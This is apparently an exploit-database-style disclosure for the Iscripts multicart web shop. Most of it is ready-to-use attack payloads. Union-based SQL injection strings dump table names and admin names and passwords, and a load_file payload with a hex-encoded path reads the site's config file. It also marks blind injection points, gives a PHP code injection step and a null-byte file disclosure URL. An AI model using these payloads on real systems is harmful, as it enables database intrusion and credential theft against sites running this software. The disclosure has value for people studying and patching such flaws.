# Iscripts multicart # Multiple vulnerabilities # Author : i-Hmx # n0p1337@gmail.com # sec4ever.com - Vendor have been contacted since 2 years for more than 20 times and he don't give ashit @ all :/ I.Sql Injection Vulns /getProductOptionDetailsAjax.php For Table name > Post product_option_id=i-Hmx'/*!1337union all select 1,(select distinct concat(0x3c62723e666172736177793c62723e3e3e,unhex(Hex(cast(table_name as char))),0x3c3c3c62723e) from information_schema.tables where table_schema=database() limit 52,1),2,3,4,5,6*/ and 'faris'='1337 Data product_option_id=i-Hmx'/*!1337union all select 1,(select concat(0x3c62723e666172736177793c62723e3e3e,admin_name,0x3a,admin_password,0x3c3c3c62723e) from fasettings) ,2,3,4,5,6*/ and 'faris'='1337 II.Blind Sql Injection vulns /product_review.php if($_SESSION["sess_userid"]!="") { $pid = ($_GET['pid']!='')?$_GET['pid']:$_POST['pid']; //checking already review exists or not $psql=mysql_query("select vDes from ".$tableprefix."Review where nUserId='".$_SESSION["sess_userid"]."' and nProdId='".$pid."'") or die(mysql_error()); if(mysql_num_rows($psql)>0) { Post : pid=%Inject_Here% /product_review_lists.php Same /rpc.php type=%Inject_Here% III-Union based Sql Injection /admin/list_meta_tags.php Post : meataid=fa' union all select 1,(select concat(admin_name,0x3a,admin_password) from mul_settings),3,4,5 and '1'='1 Post : meataid=fa' union all select 1,(select version() ),3,4,5 and '1'='1 meataid=fa' union all select 1,load_file(0x433a5c417070536572765c7777775c6c61625c6d756c746963617274322e345c696e636c756465735c636f6e6669672e706870),3,4,5 and '1'='1 VI.PHP Code Injection /response.php Post : HTTP_RAW_POST_DATA=Code File found at : csv/test77.txt Include it via V.LFD > for file inside csv directory < need dev > /includes/download.php?f=f.php%00.csv